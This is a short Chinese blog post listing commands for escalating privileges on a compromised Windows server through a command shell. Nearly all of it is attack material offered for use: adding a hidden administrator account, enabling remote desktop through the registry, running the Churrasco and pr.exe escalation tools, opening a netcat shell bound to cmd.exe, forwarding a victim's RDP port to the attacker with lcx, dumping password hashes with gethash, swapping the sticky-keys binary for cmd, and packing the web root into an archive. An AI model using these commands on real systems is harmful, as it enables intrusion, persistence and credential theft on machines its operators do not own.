關於cmdshell提權的一些命令

tsvico發表於2017-04-13
CMD部分提權常用命令


ipconfig         顯示本地IP地址


net start telnet           開telnet服務


net use z:127.0.0.1c$     對映對方的C盤 


net user            檢視所有使用者列表


net user xiaoma xiaoma /add           新增使用者xiaoma密碼為xiaoma


net localgroup administrators xiaoma /add   將帳號xiaoma升級為管理員 


attrib    隱藏檔案


開3389


REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f




查終端埠


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp 
 
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■


巴西烤肉   Churrasco.exe "命令"


使用方法:


C:\RECYCLER\Churrasco.exe "net user xiaoma xiaoma /add && net localgroup administrators xiaoma /add"


C:\RECYCLER\Churrasco.exe "net user admin$ /del"  刪除帳號


query user  檢視會話


logoff ID號  踢掉


C:\RECYCLER\Churrasco.exe "logoff 1"  


■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■


NC反彈


路徑\nc.exe -l -p 埠 -t -e 路徑\cmd.exe


c:\RECYCLER\nc.exe -l -p 1234 -t -e c:\RECYCLER\cmd.exe


NC上傳


DOS介面下執行:


NC -vv www.baidu.com 80<1.txt


-vv: 回顯


80: www埠


1.txt: 就是你要傳送的資料包


■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■


LCX埠轉發


先本地監聽51埠 lcx.exe -listen 51 3389


c:\recycler\lcx.exe -slave 自己的ip 51 肉雞IP 3389    LCX轉發


c:\recycler\lcx.exe -slave 222.222.222.222 51 111.111.111.111 3389


■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■


360提權


1.開啟終端服務,埠為3389;用法:360.exe “port”
2.替換5下shift為cmd;用法:360.exe “sethc”




====================================================================


gethash使用




C:\RECYCLER\gethash.exe $local


=========================================================================


pr提權




c:\recycler\cmd.exe
c:\recycler\pr.exe


pr.exe "net user xiaoma xiaoma /add & net localgroup administrators xiaoma /add"


================================================================================
rar.exe打包命令


cmd.exe /c "\Program Files\winrar\rar.exe" a -r d:\wwwroot\1.rar d:\wwwroot




相關文章